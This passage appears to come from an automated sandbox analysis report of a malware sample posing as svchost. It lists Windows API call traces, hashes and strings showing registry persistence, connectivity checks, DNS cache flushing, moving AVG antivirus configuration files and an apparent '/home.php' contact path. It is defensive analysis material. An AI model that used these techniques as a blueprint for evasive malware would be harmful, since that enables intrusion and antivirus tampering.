• API ID: Card$Context$Release$ConnectEstablishFreeListMemoryReaders
• String ID:
APIs
• RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02C73A83), ref: 02C73784
• RegQueryValueExA.KERNEL32(00000000,92f35d9aa,00000000,?,00000000,?), ref: 02C737A5
• RegCloseKey.ADVAPI32(00000000), ref: 02C737B3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: 92f35d9aa$software\microsoft
APIs
• GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C97604), ref: 02C97163
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02C97604), ref: 02C9718B
• GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02C97604), ref: 02C971B5
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02C97604), ref: 02C971C3
• FileTimeToDosDateTime.KERNEL32(?,02C97604,?), ref: 02C971D5
  • Part of subcall function 02C96C70: GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: FileTime$Type$DateLocalPointerSystem
• String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C763D0
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,75570F10,00000000), ref: 02C763EC
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C76060,00000000,00000000,00000000), ref: 02C76448
                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00000000,?,75570F10,00000000), ref: 02C76470
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,75570F10,00000000), ref: 02C76488
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2160739018-0
                                                                                                                                                                                                            • Opcode ID: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
                                                                                                                                                                                                            • Instruction ID: 3dc0d04ed023514038422d4c70a89f5ca956cc4b8728a668e52f9eeb92603945
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF21DDB1E80A546BEB10E760ECC5FAE72ADEB8071CF200770EE19A70C0D7709981CAD5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            • Opcode ID: 0b609fae7a0dbe937c88966c93b64d93a14e5f869262433ddc5deab3e111d806
                                                                                                                                                                                                            • Instruction ID: bcfdb10e190382c844aedb08370d7e2ec974b05cb5c38baabface1b0808283fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b609fae7a0dbe937c88966c93b64d93a14e5f869262433ddc5deab3e111d806
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15212730800659A7DB11A7689D54BEA7BBCEB5130CF308AE5D94193280EB70DA44CFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapValidate.KERNEL32(00000000), ref: 02C97ABD
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapFree.KERNEL32(00000000), ref: 02C97AD1
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapValidate.KERNEL32(00000000), ref: 02C97AE3
                                                                                                                                                                                                              • Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
                                                                                                                                                                                                              • Part of subcall function 02C97A50: HeapFree.KERNEL32(00000000), ref: 02C97AF3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3732962355-0
                                                                                                                                                                                                            • Opcode ID: 2b3ccb1d657ac3d2b086756fef2aa2d9474852e8b5a35f85c6c781cd750fab56
                                                                                                                                                                                                            • Instruction ID: 8afb5dcd38b0cf55b058242d8ad3db136849feb27d825dc79ec1e2b03c97b0de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b3ccb1d657ac3d2b086756fef2aa2d9474852e8b5a35f85c6c781cd750fab56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11E6B0A423449BEB21CF65D94C72AFBF8AF85B04F1009ACD845C3241E774DA08CA90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,755730D0,75573240,?,02C86C2C,?,00000000,?,?), ref: 02C764FD
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76518
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76523
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,02C86C2C,?,00000000), ref: 02C76542
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,02C86C2C,?,00000000), ref: 02C76553
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1150544999-0
                                                                                                                                                                                                            • Opcode ID: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
                                                                                                                                                                                                            • Instruction ID: 98b00093aa3a58c397da18543a5d5bb16bafac63a40451ced172bc20f7b26919
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4111C672680A447BE7218A56EC48FAB7B5CEBC5B64F148219FE05C7185C734CA05D771
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C76084
                                                                                                                                                                                                              • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F72
                                                                                                                                                                                                              • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F90
                                                                                                                                                                                                              • Part of subcall function 02C75F50: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C75FAD
                                                                                                                                                                                                              • Part of subcall function 02C75F50: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C7601D
                                                                                                                                                                                                              • Part of subcall function 02C75F50: RegSetValueExA.ADVAPI32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C7603F
                                                                                                                                                                                                              • Part of subcall function 02C75F50: RegCloseKey.ADVAPI32(?), ref: 02C7604D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C760B4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C760B7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C760C4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C760C7
                                                                                                                                                                                                              • Part of subcall function 02C75C80: memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                              • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                              • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexit$Heap$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1120961889-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,02C8797D,6d1da6b7,?,?,?,?,?,?), ref: 02C769D7
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769E2
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C769EA
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C769F5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769FC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1233776721-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7742FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3228293703-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C85890,00000000,00000000,00000000), ref: 02C862A4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C862BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C862CD
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02C862D5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4233414108-0
                                                                                                                                                                                                            • Opcode ID: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
                                                                                                                                                                                                            • Instruction ID: d8b473da1fd9b586a227525e106e6f6449cad00aa78bfcce2198c722376e50d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d328a97ac5bed89f73c61e0b3d1f8b3cad970d3428fa4f8c58baed391d3095c6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE09B30EC1358B7F3219750DC0EF5A7A5C9F01B0AF2441D0F905A71C0C7F0A6108665
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02C7FB89), ref: 02C82D2E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C82D31
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82D3E
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 02C82D41
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 07c29e088f6407a3c1b671805ce8a7680b473906e45e3321fa095ff160c14e2b
                                                                                                                                                                                                            • Instruction ID: be8f1778965c0c07a9d66c456fb5c780ad26caee6bc2a9a65f3407831dee69f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07c29e088f6407a3c1b671805ce8a7680b473906e45e3321fa095ff160c14e2b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96D0C931F892E476D66236A67C0CF5B6E1CDFC1B56F098A42F909DB094DB609111C9B2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                              • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                              • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                              • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835F8
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835FB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C83608
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000000,75570F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C8360B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 789118668-0
                                                                                                                                                                                                            • Opcode ID: 6ac6e39874d9b8a87fc39220fb479dd2fe0c69e0d2da136d3b06b31e35e5977b
                                                                                                                                                                                                            • Instruction ID: bf5478c376627f2509143d8bfa76f969eb437a9b52595ec0a6831fcc23554143
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ac6e39874d9b8a87fc39220fb479dd2fe0c69e0d2da136d3b06b31e35e5977b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23012431F892801ADF116B3D686073AABDA9FC2968B0C92DAE446C7280D722C9008340
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02C975F3), ref: 02C970CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: e0b0319cb903f30aaee89296e4cc31b7d61303c5611d790538c0c254949ea6e6
                                                                                                                                                                                                            • Instruction ID: 0c918c480530b2e208f2bf5f63c3885e27971d0dfa48691c777c5f3d850b4b0e
